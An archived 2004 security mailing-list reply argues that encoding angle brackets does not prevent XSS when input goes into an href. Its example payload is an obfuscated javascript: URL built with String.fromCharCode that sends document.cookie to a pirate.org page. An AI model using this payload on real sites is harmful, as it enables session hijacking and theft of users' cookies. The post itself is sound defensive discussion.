WebApp Sec mailing list archives

Re: [Re: AppSec FAQ at OWASP]

From: "Philippe Prados" <pprados () club-internet fr>
Date: Fri, 30 Jan 2004 08:51:33 +0100

In-Reply-To: <310iaCqnW6720S13.1075394388 () uwdvg013 cms usa net>

An easier solution to prevent XSS attacks might be to HTML encode the "<"

and ">" characters as &lt and &gt. So even if they are accepted as input
from the user, it would not result in the execution of a script like
&lt;script&gt;...&lt;/script&gt;.


No. It's not correct. With this code :
<a href="<%= escapeHTML(url)%>/doc.html">Document</a>

The hacker can inject in the variable url the value :
javascript:eval(String.fromCharCode(60,115,99,114,105,112,116,62,110,101,119
,32,73,109,97,103,101,40,41,46,115,114,99,61,34,104,116,116,112,58,47,47,112
,105,114,97,116,101,46,111,114,103,47,118,111,108,101,99,111,111,107,105,101
,46,106,115,112,63,99,61,34,43,101,115,99,97,112,101,40,100,111,99,117,109,1
01,110,116,46,99,111,111,107,105,101,41,59,60,47,115,99,114,105,112,116,62))
and execute a script without <, > or &!

Phil

Current thread:

Re: [Re: AppSec FAQ at OWASP] Sangita Pakala (Jan 29)
- Re: [Re: AppSec FAQ at OWASP] Omar Ismail (Jan 29)
- <Possible follow-ups>
- Re: [Re: AppSec FAQ at OWASP] Rohyt Belani (Jan 29)
  - Re: [Re: AppSec FAQ at OWASP] Philippe P. (Jan 30)
  - Re: [Re: AppSec FAQ at OWASP] Philippe Prados (Jan 30)
    - Re: [Re: AppSec FAQ at OWASP] Ulf Härnhammar (Jan 30)
- Re: [Re: AppSec FAQ at OWASP] Omarjan Ismail (Jan 29)
- Re: [Re: AppSec FAQ at OWASP] Rohyt Belani (Jan 30)